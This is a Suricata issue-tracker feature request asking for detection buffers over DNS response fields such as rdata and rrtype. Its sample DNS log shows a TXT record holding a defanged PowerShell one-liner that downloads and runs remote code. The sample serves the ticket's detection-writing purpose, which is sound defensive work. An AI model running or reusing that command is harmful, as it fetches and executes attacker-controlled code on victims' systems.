Project

General

Profile

Actions
Copy link

Feature #2448

open

Add additional buffers for DNS Responses

Added by Jack Mott over 6 years ago. Updated about 1 year ago.

Status:
New
Priority:
Normal
Assignee:
OISF Dev
Target version:
8.0.0-beta1
Effort:
Difficulty:
Label:
Beginner, Protocol

Description

Hi,

It would be nice to be able to include additional buffers for the DNS protocol responses to help write more efficient and effective signatures.

I think buffers for sections like rdata and rrtype should be included to cover things like data in TXT Records, but it could be expanded to cover the other sections of the response.

{  
   "timestamp":"2018-02-14T19:12:58.760866-0700",
   "flow_id":345727363089610,
   "pcap_cnt":4,
   "event_type":"dns",
   "src_ip":"8.8.8.8",
   "src_port":53,
   "dest_ip":"192.168.0.105",
   "dest_port":49153,
   "proto":"UDP",
   "dns":{  
      "type":"answer",
      "id":2,
      "rcode":"NOERROR",
      "rrname":"shinobotps1[.]com",
      "rrtype":"TXT",
      "ttl":3600,
      "rdata":"powershell IEX (New-Object Net.WebClient).DownloadString('hxxps:\/\/shinobotps1[.]com\/download_get.php');" 
   }
}

Thanks!

Related issues 4 (4 open0 closed)

Related to Suricata - Feature #2198: Extend the DNS parser to accept dns_response keyword in signaturesNewCommunity TicketActions
Related to Suricata - Task #4097: Suricon 2020 brainstormAssignedVictor JulienActions
Related to Suricata - Feature #7012: Add dns.response sticky bufferNewNathan ScrivensActions
Related to Suricata - Feature #5642: DNS: parity between log fields and detectionNewJason IshActions
Actions
Copy link

Also available in: Atom PDF